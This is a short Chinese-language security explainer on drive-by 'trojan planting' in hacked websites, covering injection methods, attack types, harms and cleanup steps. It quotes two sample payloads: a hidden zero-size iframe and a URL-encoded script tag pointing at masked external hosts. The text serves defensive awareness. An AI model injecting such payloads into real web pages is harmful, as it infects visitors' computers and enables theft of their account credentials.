[[174045]]

介紹

掛馬攻擊是指攻擊者在已經獲得控制權的網站的網頁中嵌入惡意代碼(通常是通過IFrame、Script引用來實現)，當用戶訪問該網頁時，嵌入的惡意代碼利用瀏覽器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞，在用戶不知情的情況下下載并執行惡意木馬。

方式

目前掛馬的主要方式是通過IFrame與Script嵌入網馬URL，比如下面的掛馬代碼：

<iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe> 

這里通過將IFrame的width與height設置為0，使得嵌入的網馬URL在網頁上不可見。

<script src=http://%68%68%6A%32***%63%6E></script> 

這里Script里的URL是經過URL encode編碼的。通過各種編碼、混淆、客戶端判斷等方式來隱藏、保護網馬是攻擊者掛馬常用的手段。除了這兩種常見的掛馬方式外，還有如下幾種：

1、 利用JavaScript執行各種經過編碼、混淆的攻擊代碼進行掛馬。

2、 利用網頁跳轉、彈出新窗口等方式進行掛馬。

3、 利用Flash等媒體封裝的方式進行掛馬。

在CSS(層疊樣式表)里可以執行JavaScript的瀏覽器中進行掛馬。

類型

1、 數據庫掛馬

攻擊者利用SQL注入漏洞將掛馬代碼注入到數據庫的某些字段中，如果網站頁面使用到這些字段的值，并且沒做適當的過濾，就有可能導致用戶訪問該網站的頁面時執行攻擊者注入的代碼。

2、 文件掛馬

攻擊者直接將掛馬代碼批量寫入服務端文件里以達到整站掛馬的目的。

3、 ARP掛馬

在與目標站點同一局域網的情況下，攻擊者可以通過控制局域網中任意一臺主機計算機發起ARP欺騙，并將掛馬代碼注入到用戶請求的響應頁面上，從而達到隱蔽的掛馬目的。這樣的攻擊方式在客戶端上也可能發生，比如用戶所在的局域網有ARP病毒，那么用戶請求的所有網站都有可能被注入掛馬代碼。

4、 服務端配置文件掛馬

比如IIS里的文件重定向、啟用文檔頁腳、修改IIS映射等掛馬。這類掛馬比較隱蔽，也是掛馬常用的技巧。

5、 XSS掛馬

利用XSS跨站腳本漏洞，將掛馬代碼注入到客戶端頁面以達到掛馬的目的。0x04 危害

網站被掛馬不僅嚴重影響到了網站的公眾信譽度，還可能對訪問該網站的用戶計算機造成很大的破壞。一般情況下，攻擊者掛馬的目的只有一個：利益。如果用戶訪問被掛網站時，用戶計算機就有可能被植入病毒，這些病毒會偷盜各類賬號密碼，如網銀賬戶、游戲賬號、郵箱賬號、QQ及MSN賬號等。植入的病毒還可能破壞用戶的本地數據，從而給用戶帶來巨大的損失，甚至讓用戶計算機淪為僵尸網絡中的一員。

修復思路

1、 通過上面介紹的“掛馬常見類型”迅速分析定位網站被掛馬的原因。

a) 數據庫掛馬：及時恢復數據庫或者利用嵌入的掛馬代碼，搜索數據庫，定位到掛馬代碼所在的字段值并清除。

b) 文件掛馬：使用工具或者命令遍歷網站所有文本文件，批量清除掛馬代碼。

c) ARP掛馬：查找出局域網中的ARP病毒源頭，清除病毒，并將相應計算機進行安全加固或重新安裝系統。

d) 服務端配置文件掛馬：如果上述的方法找不到掛馬代碼時，就應該查找網站服務端配置文件是否存在異常，并恢復。

e) XSS掛馬：這類掛馬使用不廣泛，修補網站的XSS漏洞即可解決問題。

及時檢測并修補網站本身以及網站所在服務端環境的各類漏洞，從而在根源上降低消除網站被掛馬的風險。